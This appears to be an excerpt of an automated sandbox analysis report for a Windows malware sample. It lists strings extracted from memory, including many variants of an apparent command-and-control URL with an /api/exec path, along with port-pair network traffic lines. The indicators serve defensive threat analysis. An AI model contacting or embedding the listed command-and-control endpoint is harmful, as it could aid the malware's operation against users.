                          Source: wjpP1EOX0L.exe, 00000000.00000003.1711898611.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000000.00000003.1711597591.0000000002460000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000000.1712569015.0000000000401000.00000020.00000001.01000000.00000004.sdmp, wjpP1EOX0L.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515695685.0000000061EA0000.00000008.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: ast.exe, 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp, is-JCPUK.tmp.3.dr, libcurl.dll.9.drString found in binary or memory: https://curl.haxx.se/V
                          Source: ast.exe, 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp, is-JCPUK.tmp.3.dr, libcurl.dll.9.drString found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
                          Source: ast.exe, ast.exe, 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp, is-JCPUK.tmp.3.dr, libcurl.dll.9.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                          Source: ast.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
                          Source: ast.exe, 0000000A.00000000.2388256151.0000000000942000.00000002.00000001.01000000.0000000C.sdmp, ast.exe.9.drString found in binary or memory: https://datatracker.ietf.org/ipr/1524/
                          Source: ast.exe, 0000000A.00000000.2388256151.0000000000942000.00000002.00000001.01000000.0000000C.sdmp, ast.exe.9.drString found in binary or memory: https://datatracker.ietf.org/ipr/1526/
                          Source: ast.exe, 0000000A.00000000.2388256151.0000000000942000.00000002.00000001.01000000.0000000C.sdmp, ast.exe.9.drString found in binary or memory: https://datatracker.ietf.org/ipr/1914/
                          Source: ast.exe, 0000000A.00000003.2877051123.00000000060A0000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2888384413.000000000609F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn-
                          Source: ast.exe, 0000000A.00000002.2996363895.0000000008F8C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akico
                          Source: ast.exe, 0000000A.00000003.2474490964.000000000608D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2436010829.0000000006071000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2435889428.0000000006065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aa
                          Source: ast.exe, 0000000A.00000003.2696699050.000000000608A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--
                          Source: ast.exe.9.drString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai
                          Source: ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai00
                          Source: ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai03
                          Source: ast.exe, 0000000A.00000002.2982914474.0000000003194000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai443...
                          Source: ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:
                          Source: ast.exe, 0000000A.00000003.2706718804.00000000060A2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2696026958.00000000060F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443
                          Source: ast.exe, 0000000A.00000003.2551675843.0000000006097000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2561692182.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525993259.0000000006099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443%
                          Source: ast.exe, 0000000A.00000003.2771015394.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2935483270.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2787353293.000000000609D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443&w
                          Source: ast.exe, 0000000A.00000003.2452887279.0000000006075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443-
                          Source: ast.exe, 0000000A.00000002.2982914474.000000000319B000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2472544479.00000000060BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...
                          Source: ast.exe, 0000000A.00000002.2981320741.0000000002F43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...43
                          Source: ast.exe, 0000000A.00000002.2981320741.0000000002F43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...43AW
                          Source: ast.exe, 0000000A.00000003.2877051123.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2993259885.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2787353293.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2429957558.0000000006092000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2730238261.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2745744616.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2819335046.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2888016220.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2730618420.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452524284.0000000006086000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2722515590.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2907031061.00000000060C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/
                          Source: ast.exe, 0000000A.00000002.2993259885.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2722515590.00000000060C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/5
                          Source: ast.exe, 0000000A.00000003.2787353293.00000000060C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/6
                          Source: ast.exe, 0000000A.00000003.2745744616.00000000060C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/Cln241119_8036.log
                          Source: ast.exe, 0000000A.00000003.2745744616.00000000060C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/Cln241119_8036.logw
                          Source: ast.exe, 0000000A.00000003.2746410358.00000000070B1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2935989467.0000000006091000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2722515590.000000000609D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2826372339.00000000070C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.000000000608D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2745744616.00000000060ED000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2935483270.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2429957558.0000000006092000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2972708017.00000000070C1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2730238261.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2973227337.00000000060B9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2826675676.0000000006087000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2819180112.00000000070C4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2825441021.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2888384413.000000000609F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2771015394.00000000060B7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2935483270.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2877395342.000000000607B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
                          Source: ast.exe, 0000000A.00000003.2730238261.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2819335046.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2888016220.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2730618420.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.00000000060C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/og
                          Source: ast.exe, 0000000A.00000002.2988967323.00000000042E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4430
                          Source: ast.exe, 0000000A.00000003.2771015394.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2706718804.00000000060A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4430wo~
                          Source: ast.exe, 0000000A.00000003.2526279673.000000000607B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452524284.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335
                          Source: ast.exe, 0000000A.00000003.2452524284.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335-
                          Source: ast.exe, 0000000A.00000003.2452834986.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452524284.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335/
                          Source: ast.exe, 0000000A.00000003.2476123740.0000000006075000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452887279.0000000006075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335:
                          Source: ast.exe, 0000000A.00000002.2981320741.0000000002F4B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335y
                          Source: ast.exe, 0000000A.00000003.2819563853.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992930514.00000000060A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4434lo~p
                          Source: ast.exe, 0000000A.00000003.2551550301.00000000060F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443:
                          Source: ast.exe, 0000000A.00000003.2877051123.00000000060A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443Io
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443K
                          Source: ast.exe, 0000000A.00000003.2476123740.0000000006075000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452887279.0000000006075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443L
                          Source: ast.exe, 0000000A.00000003.2746778261.00000000060A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443Ow
                          Source: ast.exe, 0000000A.00000003.2435889428.0000000006075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443U
                          Source: ast.exe, 0000000A.00000003.2907031061.00000000060A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443Vw
                          Source: ast.exe, 0000000A.00000003.2787353293.000000000609D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443Wl
                          Source: ast.exe, 0000000A.00000003.2819563853.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2746778261.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2670067675.000000000609D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443aw
                          Source: ast.exe, 0000000A.00000003.2856120074.00000000060A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443ers
                          Source: ast.exe, 0000000A.00000003.2551675843.0000000006097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443l
                          Source: ast.exe, 0000000A.00000003.2474490964.000000000608D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443r
                          Source: ast.exe, 0000000A.00000003.2670067675.000000000609D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443sw.~
                          Source: ast.exe, 0000000A.00000003.2430087607.000000000605F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443t:
                          Source: ast.exe, 0000000A.00000003.2551550301.00000000060F1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2535632567.000000000607B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526279673.000000000607B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443w
                          Source: ast.exe, 0000000A.00000003.2552338521.0000000006075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443y
                          Source: ast.exe, 0000000A.00000003.2746778261.00000000060A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443zo-
                          Source: ast.exe, 0000000A.00000002.2995912080.00000000075CD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiDUdu
                          Source: ast.exe, 0000000A.00000003.2552338521.0000000006061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai_
                          Source: ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aid003
                          Source: ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aidll03
                          Source: ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aie03
                          Source: ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2430087607.000000000605F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2436010829.0000000006071000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2435889428.0000000006065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiexe
                          Source: ast.exe, 0000000A.00000003.2436010829.0000000006071000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2435889428.0000000006065000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2476123740.0000000006060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiexe7
                          Source: ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2476123740.0000000006060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiexel
                          Source: ast.exe, 0000000A.00000003.2476123740.0000000006060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aill
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aillll
                          Source: ast.exe, 0000000A.00000003.2476123740.0000000006060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aillx;
                          Source: ast.exe, 0000000A.00000002.2982914474.0000000003194000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiq
                          Source: ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ais.dll
                          Source: ast.exe, 0000000A.00000003.2452887279.0000000006060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ait.dll
                          Source: ast.exe, 0000000A.00000003.2436010829.0000000006071000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2435889428.0000000006065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ait.l;
                          Source: ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aixh-~
                          Source: xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: https://sectigo.com/CPS0
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0B
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.drString found in binary or memory: https://sectigo.com/CPS0C
                          Source: xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: https://sectigo.com/CPS0D
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2534997545.00000000060BF000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0D
                          Source: xcopy.exe, 00000009.00000003.2089288252.00000000035F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006978493.000000006CA52000.00000002.00000001.01000000.00000013.sdmp, ast.exe, 0000000A.00000002.3000753196.000000006BE60000.00000002.00000001.01000000.00000014.sdmp, is-UA1D6.tmp.3.drString found in binary or memory: https://www.openssl.org/H
                          Source: is-VCJTB.tmp.3.drString found in binary or memory: https://www.openssl.org/docs/faq.html
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
